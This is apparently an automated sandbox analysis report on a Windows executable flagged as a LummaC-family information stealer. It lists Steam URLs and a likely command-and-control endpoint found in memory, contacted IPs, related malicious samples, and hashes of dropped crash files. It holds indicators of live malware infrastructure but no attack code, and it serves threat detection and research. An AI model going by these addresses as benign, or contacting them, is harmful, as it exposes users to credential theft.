                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&aNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=englNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://help.steampowered.coNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://recaptcha.netNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://lev-tolstoi.com/api2NQbg5Ht2hW.exe, 00000000.00000003.1453277618.000000000069F000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716924081.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1453014795.000000000068B000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1453201659.000000000068C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://upx.sf.netAmcache.hve.4.drfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://community.fastly.steamstaNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                https://store.steampowered.com/NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://community.fastNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://127.0.0.1:27060NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://cdn.fastly.steamstatic.cNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gifNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQNQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&ampNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://help.steampowered.com/NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://api.steampowered.com/NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://store.steampowered.com/account/cookiepreferences/NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://community.fastly.sNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                          https://store.steampowered.com/mobileNQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.cNQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high

                                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                              172.67.157.254
                                                                                                                                                                                                                              		lev-tolstoi.comUnited States
                                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                              23.55.153.106
                                                                                                                                                                                                                              		steamcommunity.comUnited States
                                                                                                                                                                                                                              		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                                              General Information

                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                              Analysis ID:1579648
                                                                                                                                                                                                                              Start date and time:2024-12-23 07:00:22 +01:00
                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                              Overall analysis duration:0h 5m 18s
                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                              Number of analysed new started processes analysed:10
                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                              Sample name:NQbg5Ht2hW.exe
                                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                                              Original Sample Name:d1137063cca03f3d3079c8c4db839b95.exe
                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                              Classification:mal100.troj.evad.winEXE@2/5@11/2
                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                              • Successful, ratio: 92%
                                                                                                                                                                                                                              • Number of executed functions: 15
                                                                                                                                                                                                                              • Number of non-executed functions: 218
                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 20.42.65.92, 13.107.246.63, 40.126.53.7, 4.175.87.197
                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                              01:01:16API Interceptor8x Sleep call for process: NQbg5Ht2hW.exe modified
                                                                                                                                                                                                                              01:01:50API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                                              IPs

                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              172.67.157.254EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                              random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                alexshlu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                  23.55.153.106uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                    hAmnMk8afk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          uZO96rXyWt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                            Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                  Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    Wave-Executor.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                      lev-tolstoi.comuLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                      EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      uZO96rXyWt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                      Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                      Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                      8ZVMneG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                      ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                      steamcommunity.comuLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      hAmnMk8afk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      uZO96rXyWt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106

                                                                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                      AKAMAI-ASN1EUuLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 23.44.201.28
                                                                                                                                                                                                                                                                      hAmnMk8afk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      uZO96rXyWt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 23.209.72.32
                                                                                                                                                                                                                                                                      Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      CLOUDFLARENETUSuLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                      gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 172.64.41.3
                                                                                                                                                                                                                                                                      EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                                                                                                      • 162.159.138.232
                                                                                                                                                                                                                                                                      Rokadernes.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                                      • 104.21.86.72
                                                                                                                                                                                                                                                                      uZO96rXyWt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                      trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      • 172.64.41.3
                                                                                                                                                                                                                                                                      fKdiT1D1dk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                      • 104.16.249.249
                                                                                                                                                                                                                                                                      fKdiT1D1dk.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                      • 104.16.248.249

                                                                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      hAmnMk8afk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      6S7hoBEHvr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      uZO96rXyWt.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Echelon.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Neverlose.cc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      bas.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Wine.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                                      Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                                      • 23.55.153.106

                                                                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NQbg5Ht2hW.exe_be778527e5a2e80588b39738b3edf6b6c58b74_1406fe3e_3a17fee9-52be-4707-8abe-8ec31f294093\Report.wer

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                                      Entropy (8bit):0.9697972037857133
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:7alnRa0HrndPF2jsFmmzuiFkZ24IO85ew:kRhHrnd4jgzuiFkY4IO8Aw
                                                                                                                                                                                                                                                                      MD5:AE42BA527DA3EAC6927714120BDB8220
                                                                                                                                                                                                                                                                      SHA1:E1F8837FE29CE8772B1CF6A012F2116E269958B7
                                                                                                                                                                                                                                                                      SHA-256:E760CE8197E09179AE273C20E81D7461D1CD715A3E8AB3D95EA6D30361FEB88A
                                                                                                                                                                                                                                                                      SHA-512:993C57BC39E13B1B9CA9E8550D88F2E9EBE9235D6F02B256CA72C7180850A8AA0D079AF89EC5D879C8C51ABED560514344DB470D5FF112845A9120B7A45A5F11
                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.0.7.2.8.4.7.2.7.5.4.9.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.4.0.7.2.8.5.8.6.8.0.2.4.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.a.1.7.f.e.e.9.-.5.2.b.e.-.4.7.0.7.-.8.a.b.e.-.8.e.c.3.1.f.2.9.4.0.9.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.b.f.a.f.2.e.9.-.3.5.8.9.-.4.1.a.b.-.a.3.a.f.-.8.e.1.a.1.f.1.7.4.a.3.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.Q.b.g.5.H.t.2.h.W...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.7.0.-.0.0.0.1.-.0.0.1.4.-.0.4.5.f.-.6.d.1.3.0.0.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.a.c.c.9.3.0.7.9.5.c.4.7.7.3.2.a.2.8.2.0.8.1.d.b.a.2.5.1.d.c.b.0.0.0.0.f.f.f.f.!.0.0.0.0.2.a.9.1.9.e.2.a.2.c.d.0.2.b.7.b.4.3.3.4.3.2.6.0.2.f.5.d.7.4.0.3.4.f.b.a.f.f.c.4.!.N.Q.b.g.5.H.t.2.h.W...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER87BB.tmp.dmp

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Mon Dec 23 06:01:25 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):50618
                                                                                                                                                                                                                                                                      Entropy (8bit):2.716311138238793
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:vqAX7ZFKZ5wOp1B3DiQcjnnbRQfZGRb6qsMYcohONPjpHBZ5QdNZlpdOCs:iKFKP7BziQcboWnAyphbQdNZJps
                                                                                                                                                                                                                                                                      MD5:14FA67D649F969E92A9C2B70023E8DE1
                                                                                                                                                                                                                                                                      SHA1:82195D7613B4772EF4558E9AB0A8EA5BAE26E8F8
                                                                                                                                                                                                                                                                      SHA-256:C839E44A5C8414507D7421C0701411CAF81228CFB1F911E6198BA84D4ED7249D
                                                                                                                                                                                                                                                                      SHA-512:A48802E3A82977C35C0CD2EFF027B1F900DCD95A0DD2013BCFA458F872E9ACF43F7D29B1330715A5877CD11401CA5719CAC3B08CC1F560911F966D23DC52B2E2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                      Preview:MDMP..a..... .........hg............4...............H...................................`.......8...........T............@.......................... ..............................................................................eJ......L!......GenuineIntel............T.......p.....hg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B07.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):8312
                                                                                                                                                                                                                                                                      Entropy (8bit):3.699284532317513
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJMja6J6YcDcSU93RJgmfWcGpDB89bcRsfeC0m:R6lXJ2a6J6YLSU9hJgmfWclcKfT
                                                                                                                                                                                                                                                                      MD5:F5ECE5DA7728856B1255A8360794A0B1
                                                                                                                                                                                                                                                                      SHA1:548AC9A04FDD431854A6A1023CA668205503B277
                                                                                                                                                                                                                                                                      SHA-256:0969DEBF7CF7A8CC278A4D352D2BFDCC07A2266112FFBFC5408E5CA921CED448
                                                                                                                                                                                                                                                                      SHA-512:2070065F71A14DACBF208468A5ACDEB2AE4446EB268EB5755C28F34E28598C47D2B9E789AF86E0A0D5BFF19F6F84B1F0E2D0922E4E133337947D0DB3D336701F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Reputation:low
